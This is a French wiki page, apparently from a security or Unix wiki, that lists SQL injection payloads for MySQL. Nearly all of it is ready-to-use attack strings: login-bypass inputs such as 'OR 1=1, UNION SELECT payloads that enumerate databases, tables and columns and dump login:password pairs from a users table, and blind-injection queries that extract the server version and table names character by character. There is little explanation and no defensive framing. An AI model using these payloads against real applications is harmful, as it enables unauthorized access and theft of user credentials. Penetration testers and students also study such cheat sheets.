1.1 Exemples utiles

De UnixWiki
Aller à : navigation, rechercher

Marche toujours 

 '='
 'OR 1=1
 'OR a=a
 'OR'
 'OR='
 'OR"="
 'OR'="
 'OR '="
 'OR "='
 'OR ='
 'OR '=
 'OR "=
 'OR ="

En ce moment, un nouveau type est à la mode, les UNION qui imposent de connaitre un minimum la morphologie de la requête, ou du moins de la deviner : UNION ALL SELECT pseudo,password FROM admins UNION ALL SELECT pseudo,password FROM admins WHERE pseudo='OR 1=1# AND password='OR =" UNION ALL SELECT pseudo,password FROM admins WHERE pseudo='OR "=' AND password='OR "='


Afficher les bases de données 

 SHOW DATABASES

Afficher les tables 

 SHOW TABLES [FROM $DATABASE]

Afficher les colonnes: 

 SHOW COLUMNS FROM $TABLE

Determiner le nombre de champs: 

 ' ORDER BY X #

Compter le nombre de colonnes 

 SELECT COUNT(*)
 FROM INFORMATION_SCHEMA.COLUMNS
 WHERE TABLE_NAME = '$TABLE'

Union select: 

 ' AND 1=0 UNION SELECT 1,2,3,4 #

Nombre de tables 

 ' AND 1=0 UNION SELECT 1,(SELECT COUNT(*) FROM information_schema.TABLES WHERE table_schema=DATABASE()),3,4 #

Lister les tables 

 ' AND 1=0 UNION SELECT 1,(SELECT GROUP_CONCAT(table_name) FROM information_schema.TABLES WHERE table_schema=DATABASE()),3,4 #


Lister les champs d'une table 

 (SELECT GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_name=0x7573657273 AND table_schema=DATABASE()),3,4 #

Trouver le mot de passe de JohnDoe 

 ' AND 1=0 UNION SELECT 1,(SELECT password FROM users WHERE login='JohnDoe'),3,4 #

Recuperer les comptes 

 ' AND 1=0 UNION SELECT 1,(SELECT GROUP_CONCAT(login,':',password,'\n') FROM users),3,4 #

Erreurs conditionnelles: 

 (SELECT IF(Condition,(SELECT 0 UNION ALL SELECT 0),0))

 (SELECT IF((1<0),(SELECT 0 UNION ALL SELECT 0),0))

Code ascii: ORD(caractere)

Extraire un caractère: SUBSTRING(texte,debut,1) (ca commence à 1)


Test de la version en Blind SQL Injection 

 (SELECT IF( ORD(SUBSTRING(@@VERSION,1,1))=53,(SELECT 0 UNION ALL SELECT 0),0))

=> Version 5.X

Recuperation du premier caractère de la première table 

 (SELECT ORD(SUBSTRING(table_name,1,1)) FROM information_schema.TABLES LIMIT 1)
 (SELECT IF( (SELECT ORD(SUBSTRING(table_name,1,1)) FROM information_schema.TABLES LIMIT 1)<128,(SELECT 0 UNION ALL SELECT 0),0))


 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
Récupérée de « https://futex.re/mediawiki/index.php?title=1.1_Exemples_utiles&oldid=1557 »